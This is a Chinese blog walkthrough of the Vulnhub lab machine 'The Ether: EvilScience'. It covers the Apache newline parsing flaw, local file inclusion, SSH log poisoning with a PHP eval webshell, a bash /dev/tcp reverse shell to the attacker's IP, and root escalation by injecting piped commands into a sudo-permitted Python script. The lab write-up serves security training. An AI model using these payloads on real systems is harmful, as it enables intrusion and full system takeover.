Vulnhub 渗透练习(八)—— THE ETHER: EVILSCIENCE

文章详细描述了一次针对ApacheHTTPD服务器的漏洞利用过程,包括环境配置、端口扫描、发现换行解析漏洞并利用LFI字典找到SSH日志,通过SSH错误日志写入一句话木马。接着,作者通过`sudo-l`发现可以root权限运行的py文件,实现提权,并获取flag。整个过程展示了网络安全测试的基本步骤和技术。
摘要由CSDN通过智能技术生成

环境搭建

环境下载

靶机和攻击机网络适配都选 NAT 即可。

信息收集

主机扫描
在这里插入图片描述
两个端口,22 和 80,且 apache httpd 2.4.0~2.4.29 存在换行解析漏洞。

Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
来自:https://vulhub.org/#/environments/httpd/CVE-2017-15715/

在这里插入图片描述
测了半天,除了一个文件包含,也没发现特别的东西,看了大佬的 wp ,用 seclists 字典中的 LFI 字典跑一下。

就可以发现一个特殊的文件,ssh 的日志,
在这里插入图片描述

getshell

ssh 连接一下靶机,curl ip/var/log/auth.log,ssh 日志已经写入。
在这里插入图片描述
这边利用 ssh 登录产生错误日志写入一句话木马。
在这里插入图片描述

访问执行命令。
在这里插入图片描述
这反弹有点迷,这样就能弹出来,直接 bash … 弹不出来。

echo "bash -i >& /dev/tcp/192.168.29.129/9999 0>&1"|bash

在这里插入图片描述
有个 py 文件,cat 了下,直接卡主,还是在页面上看吧,里面是一堆加密后的代码。

在这里插入图片描述

提权

sudo -l 发现 xxxlogauditorxxx.py 可以以 root 运行。

在这里插入图片描述
先开个终端

python -c 'import pty;pty.spawn("/bin/bash");'

然后如下,就可以以 root 权限运行。

sudo ./xxxlogauditorxxx.py
/var/log/auth.log | whoami

在这里插入图片描述

flag

复制 root 目录下的 flag 到网站中,下载下来,解码。

/var/log/auth.log | cp /root/flag.png /var/www/html/theEther.com/public_html/flag.png

在这里插入图片描述

wp

https://blog.csdn.net/weixin_34220834/article/details/88772835

总结

本地文件包含:利用 ssh 登录产生错误日志写入一句话木马
(ssh '<?php eval($_GET[1]);?>'@ip)
seclists 字典:https://github.com/danielmiessler/SecLists
sudo -l
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值